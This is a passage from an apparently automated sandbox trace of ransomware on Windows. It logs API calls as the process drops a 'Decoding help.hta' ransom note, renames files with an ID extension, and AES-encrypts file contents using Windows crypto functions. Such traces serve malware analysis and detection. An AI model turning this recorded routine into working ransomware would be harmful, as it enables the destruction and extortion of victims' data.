help.hta", lpString2="jsdebuggeride.dll.mui") returned -1 [0041.089] lstrlenW (lpString="jsdebuggeride.dll.mui") returned 21 [0041.089] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="jsdebuggeride.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" [0041.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" [0041.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdebuggeride.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsdebuggeride.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\jsdebuggeride.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.090] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="JSProfilerCore.dll.mui", cAlternateFileName="")) returned 1 [0041.090] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.090] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.090] lstrcmpiW (lpString1="Decoding help.hta", lpString2="JSProfilerCore.dll.mui") returned -1 [0041.090] lstrlenW (lpString="JSProfilerCore.dll.mui") returned 22 [0041.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.090] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="JSProfilerCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" [0041.090] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" [0041.090] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilercore.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\JSProfilerCore.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilercore.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.091] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 1 [0041.091] lstrcpyW (in: lpString1=0x5fa90f0, lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" [0041.091] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\Decoding help.hta" (normalized: "c:\\program files\\internet explorer\\en-us\\decoding help.hta")) returned 0x1 [0041.091] lstrcmpiW (lpString1="Decoding help.hta", lpString2="jsprofilerui.dll.mui") returned -1 [0041.091] lstrlenW (lpString="jsprofilerui.dll.mui") returned 20 [0041.091] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*" [0041.091] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\*.*") returned 48 [0041.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\", lpString2="jsprofilerui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" [0041.091] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" [0041.091] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0041.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Internet Explorer\\en-US\\jsprofilerui.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\internet explorer\\en-us\\jsprofilerui.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0041.104] FindNextFileW (in: hFindFile=0x5a56f0, lpFindFileData=0xb7cfd30 | out: lpFindFileData=0xb7cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x128de43b, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x12aa84e7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x128de43b, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="jsprofilerui.dll.mui", cAlternateFileName="")) returned 0 [0041.104] FindClose (in: hFindFile=0x5a56f0 | out: hFindFile=0x5a56f0) returned 1 Thread: id = 127 os_tid = 0x88c [0040.170] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*", lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x801d42c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x801d42c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a58b0 [0040.170] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.170] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801ae160, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x801d42c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x801d42c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.170] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.170] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.170] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80220580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 1 [0040.170] lstrcmpW (lpString1=".", lpString2="Java Update") returned -1 [0040.170] lstrcmpW (lpString1="..", lpString2="Java Update") returned -1 [0040.170] lstrcmpiW (lpString1="windows", lpString2="Java Update") returned 1 [0040.170] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*" [0040.170] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\*.*") returned 48 [0040.170] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\", lpString2="Java Update" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update" [0040.171] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Java\\Java Update\\*.*" [0040.171] GlobalMemoryStatus (in: lpBuffer=0xb90fd10 | out: lpBuffer=0xb90fd10) [0040.171] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x94a8730, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x234 [0040.171] CloseHandle (hObject=0x234) returned 1 [0040.171] FindNextFileW (in: hFindFile=0x5a58b0, lpFindFileData=0xb90fd30 | out: lpFindFileData=0xb90fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x801d42c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x80220580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80220580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Java Update", cAlternateFileName="JAVAUP~1")) returned 0 [0040.171] FindClose (in: hFindFile=0x5a58b0 | out: hFindFile=0x5a58b0) returned 1 Thread: id = 128 os_tid = 0x888 [0040.173] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8290 [0041.771] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.771] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf6e34d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa13c510, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa13c510, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.771] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.771] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.771] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0041.771] lstrcpyW (in: lpString1=0x10ba6450, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0041.771] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.771] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.771] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.772] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0042.013] WriteFile (in: hFile=0x4d4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x468fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x468fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.014] CloseHandle (hObject=0x4d4) returned 1 [0042.014] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.014] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InfLR.cab") returned -1 [0042.014] lstrlenW (lpString="InfLR.cab") returned 9 [0042.014] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0042.014] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0042.014] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="InfLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0042.015] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" [0042.015] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0042.015] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.145] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x544 [0042.145] CreateFileMappingA (hFile=0x544, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x548 [0042.145] CryptAcquireContextA (in: phProv=0x468fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x468fcec*=0x1151b340) returned 1 [0047.442] CryptGenKey (in: hProv=0x1151b340, Algid=0x6610, dwFlags=0x1, phKey=0x468fce8 | out: phKey=0x468fce8*=0x5d8ad0) returned 1 [0047.442] CryptExportKey (in: hKey=0x5d8ad0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x468fbe4, pdwDataLen=0x468fce4 | out: pbData=0x468fbe4*, pdwDataLen=0x468fce4*=0x2c) returned 1 [0047.442] MapViewOfFile (hFileMappingObject=0x548, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xf9d0000 [0047.461] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x468fbe4*, pdwDataLen=0x468fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x468fbe4*, pdwDataLen=0x468fcf8*=0x100) returned 1 [0047.461] CryptEncrypt (in: hKey=0x5d8ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xf9d0000, pdwDataLen=0x468fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xf9d0000*, pdwDataLen=0x468fce4*=0x100000) returned 1 [0048.561] UnmapViewOfFile (lpBaseAddress=0xf9d0000) returned 1 [0048.579] CloseHandle (hObject=0x548) returned 1 [0048.579] CryptDestroyKey (hKey=0x5d8ad0) returned 1 [0048.579] CryptReleaseContext (hProv=0x1151b340, dwFlags=0x0) returned 1 [0048.579] SetFilePointerEx (in: hFile=0x544, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.579] WriteFile (in: hFile=0x544, lpBuffer=0x468fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x468fcf8, lpOverlapped=0x0 | out: lpBuffer=0x468fbe4*, lpNumberOfBytesWritten=0x468fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.887] WriteFile (in: hFile=0x544, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x468fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x468fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.888] CloseHandle (hObject=0x544) returned 1 [0058.653] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.653] FindNextFileW (in: hFindFile=0x5d8290, lpFindFileData=0x468fd30 | out: lpFindFileData=0x468fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf6e58f90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2fac00, dwReserved0=0x0, dwReserved1=0x0, cFileName="InfoPathMUI.msi", cAlternateFileName="INFOPA~1.MSI")) returned 1 [0058.653] lstrcpyW (in: lpString1=0x2515f9f0, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0058.653] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.653] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.653] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InfoPathMUI.msi") returned -1 [0058.653] lstrlenW (lpString="InfoPathMUI.msi") returned 15 [0058.654] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*" [0058.654] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.654] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\", lpString2="InfoPathMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0058.654] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi" [0058.654] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All 